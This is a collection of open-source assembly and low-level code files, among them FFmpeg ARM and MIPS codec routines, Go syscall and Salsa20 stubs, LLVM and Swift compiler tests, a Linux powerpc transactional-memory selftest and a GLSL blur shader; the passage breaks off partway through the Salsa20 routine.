.endm
/* void ff_mlp_rematrix_channel_arm(int32_t *samples,
* const int32_t *coeffs,
* const uint8_t *bypassed_lsbs,
* const int8_t *noise_buffer,
* int index,
* unsigned int dest_ch,
* uint16_t blockpos,
* unsigned int maxchan,
* int matrix_noise_shift,
* int access_unit_size_pow2,
* int32_t mask);
*/
function ff_mlp_rematrix_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {v1-sl}
teq v4, #1
itt ne
teqne v4, #5
teqne v4, #7
bne 99f
teq v6, #64
it ne
teqne v6, #128
bne 99f
sub v2, v2, #MAX_CHANNELS
push {a4,v2,sl} // initialise NOISE,DCH,MASK; make sp dword-aligned
movs INDEX, v3, lsl #7
beq 98f // just in case, do nothing if blockpos = 0
subs INDEX, INDEX, #1<<7 // offset by 1 so we borrow at the right time
adc lr, v1, v1 // calculate index2 (C was set by preceding subs)
orr INDEX, INDEX, lr
// Switch on matrix_noise_shift: values 0 and 1 are
// disproportionately common so do those in a form the branch
// predictor can accelerate. Values can only go up to 15.
cmp v5, #1
beq 11f
blo 10f
A ldr v5, [pc, v5, lsl #2]
A add pc, pc, v5
T tbh [pc, v5, lsl #1]
0:
branch_pic_label 0, 0, (12f - 0b), (13f - 0b)
branch_pic_label (14f - 0b), (15f - 0b), (16f - 0b), (17f - 0b)
branch_pic_label (18f - 0b), (19f - 0b), (20f - 0b), (21f - 0b)
branch_pic_label (22f - 0b), (23f - 0b), (24f - 0b), (25f - 0b)
10: switch_on_au_size 0
11: switch_on_au_size 1
12: switch_on_au_size 2
13: switch_on_au_size 3
14: switch_on_au_size 4
15: switch_on_au_size 5
16: switch_on_au_size 6
17: switch_on_au_size 7
18: switch_on_au_size 8
19: switch_on_au_size 9
20: switch_on_au_size 10
21: switch_on_au_size 11
22: switch_on_au_size 12
23: switch_on_au_size 13
24: switch_on_au_size 14
25: switch_on_au_size 15
98: add sp, sp, #3*4
pop {v1-fp,pc}
99: // Can't handle these parameters, drop back to C
pop {v1-fp,lr}
b X(ff_mlp_rematrix_channel)
endfunc
.unreq PSA
.unreq PCO
.unreq PBL
.unreq INDEX
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq SA0
.unreq SA1
.unreq SA2
.unreq SA3
.unreq AC0
.unreq AC1
.unreq NOISE
.unreq LSB
.unreq DCH
.unreq MASK
| {
"language": "Assembly"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for amd64, Solaris are implemented in runtime/syscall_solaris.go
//
TEXT ·sysvicall6(SB),NOSPLIT,$0-88
JMP syscall·sysvicall6(SB)
TEXT ·rawSysvicall6(SB),NOSPLIT,$0-88
JMP syscall·rawSysvicall6(SB)
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for 386, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
TEXT ·socketcall(SB),NOSPLIT,$0-36
JMP syscall·socketcall(SB)
TEXT ·rawsocketcall(SB),NOSPLIT,$0-36
JMP syscall·rawsocketcall(SB)
TEXT ·seek(SB),NOSPLIT,$0-28
JMP syscall·seek(SB)
| {
"language": "Assembly"
} |
; RUN: llc -O0 -mtriple=amdgcn-amd-amdhsa -mcpu=fiji -verify-machineinstrs -filetype=obj < %s | llvm-dwarfdump -v -debug-info - | FileCheck %s
; LLVM IR generated with the following command and OpenCL source:
;
; $clang -cl-std=CL2.0 -g -O0 -target amdgcn-amd-amdhsa -S -emit-llvm <path-to-file>
;
; global int GlobA;
; global int GlobB;
;
; kernel void kernel1(unsigned int ArgN, global int *ArgA, global int *ArgB) {
; ArgA[ArgN] += ArgB[ArgN];
; }
declare void @llvm.dbg.declare(metadata, metadata, metadata)
; CHECK: {{.*}}DW_TAG_variable
; CHECK-NEXT: DW_AT_name {{.*}}"GlobA"
; CHECK-NEXT: DW_AT_type
; CHECK-NEXT: DW_AT_external
; CHECK-NEXT: DW_AT_decl_file
; CHECK-NEXT: DW_AT_decl_line
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_addr 0x0)
@GlobA = common addrspace(1) global i32 0, align 4, !dbg !0
; CHECK: {{.*}}DW_TAG_variable
; CHECK-NEXT: DW_AT_name {{.*}}"GlobB"
; CHECK-NEXT: DW_AT_type
; CHECK-NEXT: DW_AT_external
; CHECK-NEXT: DW_AT_decl_file
; CHECK-NEXT: DW_AT_decl_line
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_addr 0x0)
@GlobB = common addrspace(1) global i32 0, align 4, !dbg !6
define amdgpu_kernel void @kernel1(
; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +4, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgN"
i32 %ArgN,
; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +8, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgA"
i32 addrspace(1)* %ArgA,
; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +16, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgB"
i32 addrspace(1)* %ArgB) !dbg !13 {
entry:
%ArgN.addr = alloca i32, align 4
%ArgA.addr = alloca i32 addrspace(1)*, align 4
%ArgB.addr = alloca i32 addrspace(1)*, align 4
store i32 %ArgN, i32* %ArgN.addr, align 4
call void @llvm.dbg.declare(metadata i32* %ArgN.addr, metadata !22, metadata !23), !dbg !24
store i32 addrspace(1)* %ArgA, i32 addrspace(1)** %ArgA.addr, align 4
call void @llvm.dbg.declare(metadata i32 addrspace(1)** %ArgA.addr, metadata !25, metadata !23), !dbg !26
store i32 addrspace(1)* %ArgB, i32 addrspace(1)** %ArgB.addr, align 4
call void @llvm.dbg.declare(metadata i32 addrspace(1)** %ArgB.addr, metadata !27, metadata !23), !dbg !28
%0 = load i32 addrspace(1)*, i32 addrspace(1)** %ArgB.addr, align 4, !dbg !29
%1 = load i32, i32* %ArgN.addr, align 4, !dbg !30
%idxprom = zext i32 %1 to i64, !dbg !29
%arrayidx = getelementptr inbounds i32, i32 addrspace(1)* %0, i64 %idxprom, !dbg !29
%2 = load i32, i32 addrspace(1)* %arrayidx, align 4, !dbg !29
%3 = load i32 addrspace(1)*, i32 addrspace(1)** %ArgA.addr, align 4, !dbg !31
%4 = load i32, i32* %ArgN.addr, align 4, !dbg !32
%idxprom1 = zext i32 %4 to i64, !dbg !31
%arrayidx2 = getelementptr inbounds i32, i32 addrspace(1)* %3, i64 %idxprom1, !dbg !31
%5 = load i32, i32 addrspace(1)* %arrayidx2, align 4, !dbg !33
%add = add nsw i32 %5, %2, !dbg !33
store i32 %add, i32 addrspace(1)* %arrayidx2, align 4, !dbg !33
ret void, !dbg !34
}
!llvm.dbg.cu = !{!2}
!opencl.ocl.version = !{!9}
!llvm.module.flags = !{!10, !11}
!llvm.ident = !{!12}
!0 = !DIGlobalVariableExpression(var: !1, expr: !DIExpression())
!1 = distinct !DIGlobalVariable(name: "GlobA", scope: !2, file: !3, line: 1, type: !8, isLocal: false, isDefinition: true)
!2 = distinct !DICompileUnit(language: DW_LANG_C99, file: !3, producer: "clang version 5.0.0", isOptimized: false, runtimeVersion: 0, emissionKind: FullDebug, enums: !4, globals: !5)
!3 = !DIFile(filename: "variable-locations.cl", directory: "/some/random/directory")
!4 = !{}
!5 = !{!0, !6}
!6 = !DIGlobalVariableExpression(var: !7, expr: !DIExpression())
!7 = distinct !DIGlobalVariable(name: "GlobB", scope: !2, file: !3, line: 2, type: !8, isLocal: false, isDefinition: true)
!8 = !DIBasicType(name: "int", size: 32, encoding: DW_ATE_signed)
!9 = !{i32 2, i32 0}
!10 = !{i32 2, !"Dwarf Version", i32 2}
!11 = !{i32 2, !"Debug Info Version", i32 3}
!12 = !{!"clang version 5.0.0"}
!13 = distinct !DISubprogram(name: "kernel1", scope: !3, file: !3, line: 4, type: !14, isLocal: false, isDefinition: true, scopeLine: 4, flags: DIFlagPrototyped, isOptimized: false, unit: !2, variables: !4)
!14 = !DISubroutineType(types: !15)
!15 = !{null, !16, !17, !17}
!16 = !DIBasicType(name: "unsigned int", size: 32, encoding: DW_ATE_unsigned)
!17 = !DIDerivedType(tag: DW_TAG_pointer_type, baseType: !8, size: 64)
!18 = !{i32 0, i32 1, i32 1}
!19 = !{!"none", !"none", !"none"}
!20 = !{!"uint", !"int*", !"int*"}
!21 = !{!"", !"", !""}
!22 = !DILocalVariable(name: "ArgN", arg: 1, scope: !13, file: !3, line: 4, type: !16)
!23 = !DIExpression(DW_OP_constu, 1, DW_OP_swap, DW_OP_xderef)
!24 = !DILocation(line: 4, column: 34, scope: !13)
!25 = !DILocalVariable(name: "ArgA", arg: 2, scope: !13, file: !3, line: 4, type: !17)
!26 = !DILocation(line: 4, column: 52, scope: !13)
!27 = !DILocalVariable(name: "ArgB", arg: 3, scope: !13, file: !3, line: 4, type: !17)
!28 = !DILocation(line: 4, column: 70, scope: !13)
!29 = !DILocation(line: 5, column: 17, scope: !13)
!30 = !DILocation(line: 5, column: 22, scope: !13)
!31 = !DILocation(line: 5, column: 3, scope: !13)
!32 = !DILocation(line: 5, column: 8, scope: !13)
!33 = !DILocation(line: 5, column: 14, scope: !13)
!34 = !DILocation(line: 6, column: 1, scope: !13)
| {
"language": "Assembly"
} |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
* Copyright 2015, Cyril Bur, IBM Corp.
*/
#include "basic_asm.h"
#include "gpr_asm.h"
#include "fpu_asm.h"
#include "vmx_asm.h"
#include "vsx_asm.h"
/*
* Large caveat here being that the caller cannot expect the
* signal to always be sent! The hardware can (AND WILL!) abort
* the transaction between the tbegin and the tsuspend (however
* unlikely it seems or infrequently it actually happens).
* You have been warned.
*/
/* long tm_signal_self_context_load(pid_t pid, long *gprs, double *fps, vector *vms, vector *vss); */
FUNC_START(tm_signal_self_context_load)
PUSH_BASIC_STACK(512)
/*
 * We don't strictly need to save and restore these (whether they are used
 * depends on the parameters), but doing so unconditionally keeps the
 * logic simple.
*/
PUSH_VMX(STACK_FRAME_LOCAL(5,0),r8)
PUSH_FPU(512)
PUSH_NVREGS_BELOW_FPU(512)
std r3, STACK_FRAME_PARAM(0)(sp) /* pid */
std r4, STACK_FRAME_PARAM(1)(sp) /* gprs */
std r5, STACK_FRAME_PARAM(2)(sp) /* fps */
std r6, STACK_FRAME_PARAM(3)(sp) /* vms */
std r7, STACK_FRAME_PARAM(4)(sp) /* vss */
ld r3, STACK_FRAME_PARAM(1)(sp)
cmpdi r3, 0
beq skip_gpr_lc
bl load_gpr
skip_gpr_lc:
ld r3, STACK_FRAME_PARAM(2)(sp)
cmpdi r3, 0
beq skip_fpu_lc
bl load_fpu
skip_fpu_lc:
ld r3, STACK_FRAME_PARAM(3)(sp)
cmpdi r3, 0
beq skip_vmx_lc
bl load_vmx
skip_vmx_lc:
ld r3, STACK_FRAME_PARAM(4)(sp)
cmpdi r3, 0
beq skip_vsx_lc
bl load_vsx
skip_vsx_lc:
/*
* Set r3 (return value) before tbegin. Use the pid as a known
* 'all good' return value, zero is used to indicate a non-doomed
* transaction.
*/
ld r3, STACK_FRAME_PARAM(0)(sp)
tbegin.
beq 1f
tsuspend. /* Can't enter a syscall transactionally */
ld r3, STACK_FRAME_PARAM(1)(sp)
cmpdi r3, 0
beq skip_gpr_lt
/* Get the second half of the array */
addi r3, r3, 8 * 18
bl load_gpr
skip_gpr_lt:
ld r3, STACK_FRAME_PARAM(2)(sp)
cmpdi r3, 0
beq skip_fpu_lt
/* Get the second half of the array */
addi r3, r3, 8 * 18
bl load_fpu
skip_fpu_lt:
ld r3, STACK_FRAME_PARAM(3)(sp)
cmpdi r3, 0
beq skip_vmx_lt
/* Get the second half of the array */
addi r3, r3, 16 * 12
bl load_vmx
skip_vmx_lt:
ld r3, STACK_FRAME_PARAM(4)(sp)
cmpdi r3, 0
beq skip_vsx_lt
/* Get the second half of the array */
addi r3, r3, 16 * 12
bl load_vsx
skip_vsx_lt:
li r0, 37 /* sys_kill */
ld r3, STACK_FRAME_PARAM(0)(sp) /* pid */
li r4, 10 /* SIGUSR1 */
sc /* Taking the signal will doom the transaction */
tabort. 0
tresume. /* Be super sure we abort */
/*
* This will cause us to resume doomed transaction and cause
* hardware to cleanup, we'll end up at 1: anything between
* tresume. and 1: shouldn't ever run.
*/
li r3, 0
1:
POP_VMX(STACK_FRAME_LOCAL(5,0),r4)
POP_FPU(512)
POP_NVREGS_BELOW_FPU(512)
POP_BASIC_STACK(512)
blr
FUNC_END(tm_signal_self_context_load)
| {
"language": "Assembly"
} |
#ifndef MUD_SHADER_BLUR
#define MUD_SHADER_BLUR
vec4 blur_7(sampler2D tex, vec2 uv, float lod, float k0, float k1, float k2, float k3, float k4, float k5, float k6)
{
vec2 pixel_size = u_pixel_size * u_source_crop.zw;
vec4 color = texture2DLod(tex, uv + vec2( 0.0, 0.0) * pixel_size, lod) * k0;
color += texture2DLod(tex, uv + vec2( 1.0, 0.0) * pixel_size, lod) * k1;
color += texture2DLod(tex, uv + vec2( 2.0, 0.0) * pixel_size, lod) * k2;
color += texture2DLod(tex, uv + vec2( 3.0, 0.0) * pixel_size, lod) * k3;
color += texture2DLod(tex, uv + vec2(-1.0, 0.0) * pixel_size, lod) * k4;
color += texture2DLod(tex, uv + vec2(-2.0, 0.0) * pixel_size, lod) * k5;
color += texture2DLod(tex, uv + vec2(-3.0, 0.0) * pixel_size, lod) * k6;
return color;
}
vec4 blur_5(sampler2D tex, vec2 uv, float lod, float k0, float k1, float k2, float k3, float k4)
{
vec2 pixel_size = u_pixel_size * u_source_crop.zw;
vec4 color = texture2DLod(tex, uv + vec2( 0.0, 0.0) * pixel_size, lod) * k0;
color += texture2DLod(tex, uv + vec2( 0.0, 1.0) * pixel_size, lod) * k1;
color += texture2DLod(tex, uv + vec2( 0.0, 2.0) * pixel_size, lod) * k2;
color += texture2DLod(tex, uv + vec2( 0.0, -1.0) * pixel_size, lod) * k3;
color += texture2DLod(tex, uv + vec2( 0.0, -2.0) * pixel_size, lod) * k4;
return color;
}
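// Usage sketch (the sampler name and kernel weights are assumed example
// values, not anything this header mandates): a separable blur runs the
// 7-tap pass horizontally and the 5-tap pass vertically with symmetric
// weights, e.g.
//   vec4 h = blur_7(s_tex, uv, 0.0, 0.383, 0.242, 0.061, 0.006,
//                                   0.242, 0.061, 0.006);
//   vec4 v = blur_5(s_tex, uv, 0.0, 0.399, 0.242, 0.054,
//                                   0.242, 0.054);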
#endif
| {
"language": "Assembly"
} |
@ RUN: llvm-mc < %s -triple thumbv5-linux-gnueabi -filetype=obj -o - \
@ RUN: | llvm-readobj -r | FileCheck %s
.syntax unified
.text
.align 2
.globl main
.type main,%function
.thumb_func
main:
bl end
.space 8192
end:
bl main2
bx lr
.text
.align 2
.globl main2
.type main2,%function
.thumb_func
main2:
bx lr
@ CHECK-NOT: 0x0 R_ARM_THM_CALL end 0x0
@ CHECK: 0x2004 R_ARM_THM_CALL main2 0x0
| {
"language": "Assembly"
} |
; RUN: llvm-as < %s | llvm-dis | grep "align 1024"
; RUN: verify-uselistorder %s
define void @test(i32* %arg) {
entry:
store i32 0, i32* %arg, align 1024
ret void
}
| {
"language": "Assembly"
} |
//
// StaticLibraryTarget.xcconfig
//
// These are static library target settings for libgtest.a. It
// is set in the "Based On:" dropdown in the "Target" info dialog.
// This file is based on the Xcode Configuration files in:
// http://code.google.com/p/google-toolbox-for-mac/
//
// Static libs can be included in bundles so make them position independent
GCC_DYNAMIC_NO_PIC = NO
// Static libs should not have their internal globals or external symbols
// stripped.
STRIP_STYLE = debugging
// Let the user install by specifying the $DSTROOT with xcodebuild
SKIP_INSTALL = NO
| {
"language": "Assembly"
} |
// RUN: %target-swift-frontend -dump-parse %s 2>&1 | %FileCheck %s
// CR
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
"""
//CHECK: string_literal_expr {{.*}} value="test"
// CR+LF
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
"""
//CHECK: string_literal_expr {{.*}} value="test"
// CR+LF
_ = """
"""
//CHECK: string_literal_expr {{.*}} value=""
_ = """
test
test
"""
//CHECK: string_literal_expr {{.*}} value="test\ntest"
// LF+CR
_ = """
foo
foo
"""
//CHECK: string_literal_expr {{.*}} value="\nfoo\n\nfoo\n"
// LF+CR+LF
_ = """
foo
foo
"""
//CHECK: string_literal_expr {{.*}} value="\nfoo\n\nfoo\n"
// Mixed no-indent.
_ = """
<LF
<LF
<CR
<CR+LF
"""
//CHECK: string_literal_expr {{.*}} value="<LF\n<LF\n<CR\n<CR+LF"
// Mixed indent.
_ = """
<LF
<LF
<CR
<CR+LF
"""
//CHECK: string_literal_expr {{.*}} value="<LF\n<LF\n<CR\n<CR+LF"
// Empty line CR, CR+LF, LF.
_ = """
foo
bar
"""
//CHECK: string_literal_expr {{.*}} value="foo\n\n\n\nbar"
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2012
* MIPS Technologies, Inc., California.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the MIPS Technologies, Inc., nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE MIPS TECHNOLOGIES, INC. ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE MIPS TECHNOLOGIES, INC. BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* Author: Nedeljko Babic (nbabic@mips.com)
*
* various filters for ACELP-based codecs optimized for MIPS
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/**
* @file
* Reference: libavcodec/acelp_filters.c
*/
#include "config.h"
#include "libavutil/attributes.h"
#include "libavcodec/acelp_filters.h"
#include "libavutil/mips/asmdefs.h"
#if HAVE_INLINE_ASM
#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6
static void ff_acelp_interpolatef_mips(float *out, const float *in,
const float *filter_coeffs, int precision,
int frac_pos, int filter_length, int length)
{
int n, i;
int prec = precision * 4;
int fc_offset = precision - frac_pos;
float in_val_p, in_val_m, fc_val_p, fc_val_m;
for (n = 0; n < length; n++) {
/**
* four pointers are defined in order to minimize number of
* computations done in inner loop
*/
const float *p_in_p = &in[n];
const float *p_in_m = &in[n-1];
const float *p_filter_coeffs_p = &filter_coeffs[frac_pos];
const float *p_filter_coeffs_m = filter_coeffs + fc_offset;
float v = 0;
for (i = 0; i < filter_length;i++) {
__asm__ volatile (
"lwc1 %[in_val_p], 0(%[p_in_p]) \n\t"
"lwc1 %[fc_val_p], 0(%[p_filter_coeffs_p]) \n\t"
"lwc1 %[in_val_m], 0(%[p_in_m]) \n\t"
"lwc1 %[fc_val_m], 0(%[p_filter_coeffs_m]) \n\t"
PTR_ADDIU "%[p_in_p], %[p_in_p], 4 \n\t"
"madd.s %[v],%[v], %[in_val_p],%[fc_val_p] \n\t"
PTR_ADDIU "%[p_in_m], %[p_in_m], -4 \n\t"
PTR_ADDU "%[p_filter_coeffs_p],%[p_filter_coeffs_p], %[prec] \n\t"
PTR_ADDU "%[p_filter_coeffs_m],%[p_filter_coeffs_m], %[prec] \n\t"
"madd.s %[v],%[v],%[in_val_m], %[fc_val_m] \n\t"
: [v] "+&f" (v),[p_in_p] "+r" (p_in_p), [p_in_m] "+r" (p_in_m),
[p_filter_coeffs_p] "+r" (p_filter_coeffs_p),
[in_val_p] "=&f" (in_val_p), [in_val_m] "=&f" (in_val_m),
[fc_val_p] "=&f" (fc_val_p), [fc_val_m] "=&f" (fc_val_m),
[p_filter_coeffs_m] "+r" (p_filter_coeffs_m)
: [prec] "r" (prec)
: "memory"
);
}
out[n] = v;
}
}
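/*
 * Scalar reference for the loop above: each output sample accumulates the
 * symmetric two-sided interpolation
 *
 *     v += in[n + i]     * filter_coeffs[frac_pos + i * precision]
 *        + in[n - 1 - i] * filter_coeffs[precision - frac_pos + i * precision];
 *
 * which is what the paired lwc1/madd.s sequences compute, the coefficient
 * pointers advancing by "precision" floats and the input pointers by one
 * float per iteration.
 */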
static void ff_acelp_apply_order_2_transfer_function_mips(float *out, const float *in,
const float zero_coeffs[2],
const float pole_coeffs[2],
float gain, float mem[2], int n)
{
/**
* loop is unrolled eight times
*/
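    /*
     * Recurrence computed by each of the eight unrolled steps (readable
     * from the msub.s/madd.s pattern below):
     *
     *     tmp    = gain * in[i] - pole_coeffs[0] * mem[0]
     *                           - pole_coeffs[1] * mem[1];
     *     out[i] = tmp + zero_coeffs[0] * mem[0] + zero_coeffs[1] * mem[1];
     *     mem[1] = mem[0];
     *     mem[0] = tmp;
     */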
__asm__ volatile (
"lwc1 $f0, 0(%[mem]) \n\t"
"blez %[n], ff_acelp_apply_order_2_transfer_function_end%= \n\t"
"lwc1 $f1, 4(%[mem]) \n\t"
"lwc1 $f2, 0(%[pole_coeffs]) \n\t"
"lwc1 $f3, 4(%[pole_coeffs]) \n\t"
"lwc1 $f4, 0(%[zero_coeffs]) \n\t"
"lwc1 $f5, 4(%[zero_coeffs]) \n\t"
"ff_acelp_apply_order_2_transfer_function_madd%=: \n\t"
"lwc1 $f6, 0(%[in]) \n\t"
"mul.s $f9, $f3, $f1 \n\t"
"mul.s $f7, $f2, $f0 \n\t"
"msub.s $f7, $f7, %[gain], $f6 \n\t"
"sub.s $f7, $f7, $f9 \n\t"
"madd.s $f8, $f7, $f4, $f0 \n\t"
"madd.s $f8, $f8, $f5, $f1 \n\t"
"lwc1 $f11, 4(%[in]) \n\t"
"mul.s $f12, $f3, $f0 \n\t"
"mul.s $f13, $f2, $f7 \n\t"
"msub.s $f13, $f13, %[gain], $f11 \n\t"
"sub.s $f13, $f13, $f12 \n\t"
"madd.s $f14, $f13, $f4, $f7 \n\t"
"madd.s $f14, $f14, $f5, $f0 \n\t"
"swc1 $f8, 0(%[out]) \n\t"
"lwc1 $f6, 8(%[in]) \n\t"
"mul.s $f9, $f3, $f7 \n\t"
"mul.s $f15, $f2, $f13 \n\t"
"msub.s $f15, $f15, %[gain], $f6 \n\t"
"sub.s $f15, $f15, $f9 \n\t"
"madd.s $f8, $f15, $f4, $f13 \n\t"
"madd.s $f8, $f8, $f5, $f7 \n\t"
"swc1 $f14, 4(%[out]) \n\t"
"lwc1 $f11, 12(%[in]) \n\t"
"mul.s $f12, $f3, $f13 \n\t"
"mul.s $f16, $f2, $f15 \n\t"
"msub.s $f16, $f16, %[gain], $f11 \n\t"
"sub.s $f16, $f16, $f12 \n\t"
"madd.s $f14, $f16, $f4, $f15 \n\t"
"madd.s $f14, $f14, $f5, $f13 \n\t"
"swc1 $f8, 8(%[out]) \n\t"
"lwc1 $f6, 16(%[in]) \n\t"
"mul.s $f9, $f3, $f15 \n\t"
"mul.s $f7, $f2, $f16 \n\t"
"msub.s $f7, $f7, %[gain], $f6 \n\t"
"sub.s $f7, $f7, $f9 \n\t"
"madd.s $f8, $f7, $f4, $f16 \n\t"
"madd.s $f8, $f8, $f5, $f15 \n\t"
"swc1 $f14, 12(%[out]) \n\t"
"lwc1 $f11, 20(%[in]) \n\t"
"mul.s $f12, $f3, $f16 \n\t"
"mul.s $f13, $f2, $f7 \n\t"
"msub.s $f13, $f13, %[gain], $f11 \n\t"
"sub.s $f13, $f13, $f12 \n\t"
"madd.s $f14, $f13, $f4, $f7 \n\t"
"madd.s $f14, $f14, $f5, $f16 \n\t"
"swc1 $f8, 16(%[out]) \n\t"
"lwc1 $f6, 24(%[in]) \n\t"
"mul.s $f9, $f3, $f7 \n\t"
"mul.s $f15, $f2, $f13 \n\t"
"msub.s $f15, $f15, %[gain], $f6 \n\t"
"sub.s $f1, $f15, $f9 \n\t"
"madd.s $f8, $f1, $f4, $f13 \n\t"
"madd.s $f8, $f8, $f5, $f7 \n\t"
"swc1 $f14, 20(%[out]) \n\t"
"lwc1 $f11, 28(%[in]) \n\t"
"mul.s $f12, $f3, $f13 \n\t"
"mul.s $f16, $f2, $f1 \n\t"
"msub.s $f16, $f16, %[gain], $f11 \n\t"
"sub.s $f0, $f16, $f12 \n\t"
"madd.s $f14, $f0, $f4, $f1 \n\t"
"madd.s $f14, $f14, $f5, $f13 \n\t"
"swc1 $f8, 24(%[out]) \n\t"
PTR_ADDIU "%[out], 32 \n\t"
PTR_ADDIU "%[in], 32 \n\t"
"addiu %[n], -8 \n\t"
"swc1 $f14, -4(%[out]) \n\t"
"bnez %[n], ff_acelp_apply_order_2_transfer_function_madd%= \n\t"
"swc1 $f1, 4(%[mem]) \n\t"
"swc1 $f0, 0(%[mem]) \n\t"
"ff_acelp_apply_order_2_transfer_function_end%=: \n\t"
: [out] "+r" (out),
[in] "+r" (in), [gain] "+f" (gain),
[n] "+r" (n), [mem] "+r" (mem)
: [zero_coeffs] "r" (zero_coeffs),
[pole_coeffs] "r" (pole_coeffs)
: "$f0", "$f1", "$f2", "$f3", "$f4", "$f5",
"$f6", "$f7", "$f8", "$f9", "$f10", "$f11",
"$f12", "$f13", "$f14", "$f15", "$f16", "memory"
);
}
#endif /* !HAVE_MIPS32R6 && !HAVE_MIPS64R6 */
#endif /* HAVE_INLINE_ASM */
void ff_acelp_filter_init_mips(ACELPFContext *c)
{
#if HAVE_INLINE_ASM
#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6
c->acelp_interpolatef = ff_acelp_interpolatef_mips;
c->acelp_apply_order_2_transfer_function = ff_acelp_apply_order_2_transfer_function_mips;
#endif
#endif
}
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,!appengine,!gccgo
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// func salsa2020XORKeyStream(out, in *byte, n uint64, nonce, key *byte)
// This needs up to 64 bytes at 360(SP); hence the non-obvious frame size.
TEXT ·salsa2020XORKeyStream(SB),0,$456-40 // frame = 424 + 32 byte alignment
MOVQ out+0(FP),DI
MOVQ in+8(FP),SI
MOVQ n+16(FP),DX
MOVQ nonce+24(FP),CX
MOVQ key+32(FP),R8
MOVQ SP,R12
MOVQ SP,R9
ADDQ $31, R9
ANDQ $~31, R9
MOVQ R9, SP
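	// The original SP was saved in R12 above; SP itself is rounded up to a
	// 32-byte boundary so that the aligned 128-bit MOVOA stores into the
	// local frame are legal.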
MOVQ DX,R9
MOVQ CX,DX
MOVQ R8,R10
CMPQ R9,$0
JBE DONE
START:
MOVL 20(R10),CX
MOVL 0(R10),R8
MOVL 0(DX),AX
MOVL 16(R10),R11
MOVL CX,0(SP)
MOVL R8, 4 (SP)
MOVL AX, 8 (SP)
MOVL R11, 12 (SP)
MOVL 8(DX),CX
MOVL 24(R10),R8
MOVL 4(R10),AX
MOVL 4(DX),R11
MOVL CX,16(SP)
MOVL R8, 20 (SP)
MOVL AX, 24 (SP)
MOVL R11, 28 (SP)
MOVL 12(DX),CX
MOVL 12(R10),DX
MOVL 28(R10),R8
MOVL 8(R10),AX
MOVL DX,32(SP)
MOVL CX, 36 (SP)
MOVL R8, 40 (SP)
MOVL AX, 44 (SP)
MOVQ $1634760805,DX
MOVQ $857760878,CX
MOVQ $2036477234,R8
MOVQ $1797285236,AX
